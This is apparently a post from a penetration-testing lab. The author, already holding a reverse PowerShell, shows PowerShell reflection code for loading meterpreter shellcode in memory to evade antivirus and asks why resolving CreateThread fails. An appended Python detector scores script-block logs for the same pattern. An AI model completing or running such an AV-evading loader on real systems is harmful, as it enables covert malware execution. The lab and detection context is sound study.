Offshore OpManager

I got a reverse PowerShell on the machine. I try to execute a meterpreter shell. To bypass the AV, I try to load my meterpreter shellcode using the DelegateType Reflection technique in order to write the malicious code only in memory. I execute the following PowerShell commands successfully:

```powershell
$systemdll = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') })
$unsafeObj = $systemdll.GetType('Microsoft.Win32.UnsafeNativeMethods')
$GetModuleHandle = $unsafeObj.GetMethod('GetModuleHandle')
$GetProcAddress = $unsafeObj.GetMethod('GetProcAddress')
$kernel32 = $GetModuleHandle.Invoke($null, @("kernel32.dll"))
```

Everything is fine at this point, but when I try to execute the following command:

```powershell
$GetProcAddress.Invoke($null, @($kernel32, "CreateThread"))
```

It returns nothing! And I don't understand why!
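For defenders, the reflection sequence in the post above is visible in PowerShell script block logging (Event ID 4104). The following is an added example, not part of the original post: a small scorer for logged script block text, where the indicator weights, the threshold and the sample strings are constructed assumptions to tune against your own telemetry.

```python
import re

# PowerShell accepts typographic quotes as string delimiters, and scripts pasted
# through forums or documents often carry them, so fold them to ASCII first.
QUOTES = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201a": "'", "\u201b": "'",
                        "\u201c": '"', "\u201d": '"', "\u201e": '"'})

# (indicator name, weight, pattern). Weights and THRESHOLD are assumptions.
INDICATORS = [
    ("unsafe_native_methods", 3,
     re.compile(r"Microsoft\.Win32\.UnsafeNativeMethods", re.I)),
    ("reflected_resolver", 2,
     re.compile(r"GetMethod\(\s*['\"]Get(ProcAddress|ModuleHandle)['\"]", re.I)),
    ("assembly_enumeration", 1,
     re.compile(r"\[AppDomain\]::CurrentDomain\.GetAssemblies\(\)", re.I)),
    ("native_api_by_name", 2,
     re.compile(r"\.Invoke\([^)]*['\"](CreateThread|VirtualAlloc|VirtualProtect)['\"]", re.I)),
]
THRESHOLD = 5


def normalise(text):
    """Fold typographic quotes so quote-sensitive patterns still match."""
    return text.translate(QUOTES)


def score_script_block(text):
    """Score one logged script block; alert when combined weight reaches THRESHOLD."""
    norm = normalise(text)
    hits = [(name, weight) for name, weight, rx in INDICATORS if rx.search(norm)]
    total = sum(weight for _, weight in hits)
    return {"score": total, "alert": total >= THRESHOLD, "hits": [n for n, _ in hits]}


# Constructed sample: the reflection pattern as it might be logged with smart quotes.
SAMPLE_SUSPECT = """
$unsafeObj = $systemdll.GetType(‘Microsoft.Win32.UnsafeNativeMethods’)
$GetProcAddress = $unsafeObj.GetMethod(‘GetProcAddress’)
$GetProcAddress.Invoke($null, @($kernel32, “CreateThread”))
"""
# Constructed sample: benign assembly inventory that shares one weak indicator.
SAMPLE_BENIGN = "[AppDomain]::CurrentDomain.GetAssemblies() | Select-Object Location"

if __name__ == "__main__":
    for label, block in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        print(label, score_script_block(block))
```

Requiring several indicators together keeps a single weak match, such as assembly enumeration in an inventory script, below the alert threshold.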